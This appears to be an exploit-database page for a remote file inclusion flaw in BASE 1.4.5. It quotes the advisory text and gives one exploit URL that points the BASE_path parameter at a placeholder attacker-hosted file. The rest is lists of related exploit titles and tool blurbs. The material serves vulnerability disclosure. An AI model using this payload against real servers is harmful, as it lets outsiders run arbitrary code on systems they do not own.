Menu

Search for hundreds of thousands of exploits

"Basic Analysis and Security Engine (BASE) 1.4.5 - '/admin/base_useradmin.php?base_path' Remote File Inclusion"

Author

Exploit author

indoushka

Platform

Exploit platform

php

Release date

Exploit published date

2012-02-11

1
2
3
4
5
6
7
8
9
source: https://www.securityfocus.com/bid/51979/info
                                    
BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities.
                                    
An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
                                    
BASE 1.4.5 is vulnerable; other versions may be affected.

Exploit: http://www.example.com/base/admin/base_useradmin.php?BASE_path=[EV!L]
Release Date Title Type Platform Author
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Bakeshop Online Ordering System 1.0 - 'Owner' Persistent Cross-site scripting" webapps multiple "Parshwa Bhavsar"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Pharmacy Store Management System 1.0 - 'id' SQL Injection" webapps php "Aydın Baran Ertemir"
Release Date Title Type Platform Author
2020-02-26 "PhpIX 2012 Professional - 'id' SQL Injection" webapps php indoushka
2020-02-24 "AMSS++ v 4.31 - 'id' SQL Injection" webapps php indoushka
2020-02-24 "AMSS++ 4.7 - Backdoor Admin Account" webapps php indoushka
2020-02-20 "Easy2Pilot 7 - Cross-Site Request Forgery (Add User)" webapps php indoushka
2014-05-08 "CMS Touch - 'news.php?News_ID' SQL Injection" webapps php indoushka
2014-05-08 "CMS Touch - 'pages.php?Page_ID' SQL Injection" webapps php indoushka
2014-05-05 "PrestaShop - 'getSimilarManufacturer.php?id_manufacturer' SQL Injection" webapps php indoushka
2014-03-17 "OpenSupports 2.0 - Blind SQL Injection" webapps php indoushka
2013-07-06 "phpVibe 3.1 - Information Disclosure / Remote File Inclusion" webapps php indoushka
2012-06-19 "AdaptCMS 2.0.2 - 'index.php' Script Cross-Site Scripting" webapps php indoushka
2012-04-17 "Joomla! Component JA T3 Framework - Directory Traversal" webapps php indoushka
2012-02-13 "Powie pFile 1.02 - '/pfile/file.php?id' SQL Injection" webapps php indoushka
2012-02-13 "Powie pFile 1.02 - '/pfile/kommentar.php?filecat' Cross-Site Scripting" webapps php indoushka
2012-02-11 "Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_stat_common.php?base_path' Remote File Inclusion" webapps php indoushka
2012-02-11 "Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_stat_ipaddr.php?base_path' Remote File Inclusion" webapps php indoushka
2012-02-11 "Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_user.php?base_path' Remote File Inclusion" webapps php indoushka
2012-02-11 "Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_stat_iplink.php?base_path' Remote File Inclusion" webapps php indoushka
2012-02-11 "Basic Analysis and Security Engine (BASE) 1.4.5 - '/includes/base_state_criteria.inc.php?base_path' Remote File Inclusion" webapps php indoushka
2012-02-11 "Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_stat_ports.php?base_path' Remote File Inclusion" webapps php indoushka
2012-02-11 "Basic Analysis and Security Engine (BASE) 1.4.5 - 'index.php?base_path' Remote File Inclusion" webapps php indoushka
2012-02-11 "Basic Analysis and Security Engine (BASE) 1.4.5 - '/includes/base_state_query.inc.php?base_path' Remote File Inclusion" webapps php indoushka
2012-02-11 "Basic Analysis and Security Engine (BASE) 1.4.5 - '/setup/base_conf_contents.php' Multiple Remote File Inclusions" webapps php indoushka
2012-02-11 "Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_stat_alerts.php?base_path' Remote File Inclusion" webapps php indoushka
2012-02-11 "Basic Analysis and Security Engine (BASE) 1.4.5 - '/includes/base_output_query.inc.php?base_path' Remote File Inclusion" webapps php indoushka
2012-02-11 "Basic Analysis and Security Engine (BASE) 1.4.5 - '/includes/base_output_html.inc.php?base_path' Remote File Inclusion" webapps php indoushka
2012-02-11 "Basic Analysis and Security Engine (BASE) 1.4.5 - '/includes/base_include.inc.php?base_path' Remote File Inclusion" webapps php indoushka
2012-02-11 "Basic Analysis and Security Engine (BASE) 1.4.5 - '/includes/base_db.inc.php?base_path' Remote File Inclusion" webapps php indoushka
2012-02-11 "Basic Analysis and Security Engine (BASE) 1.4.5 - '/includes/base_cache.inc.php?base_path' Remote File Inclusion" webapps php indoushka
2012-02-11 "Basic Analysis and Security Engine (BASE) 1.4.5 - '/includes/base_action.inc.php?base_path' Remote File Inclusion" webapps php indoushka
2012-02-11 "Basic Analysis and Security Engine (BASE) 1.4.5 - '/includes/base_state_common.inc.php?GLOBALS[user_session_path]' Remote File Inclusion" webapps php indoushka
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.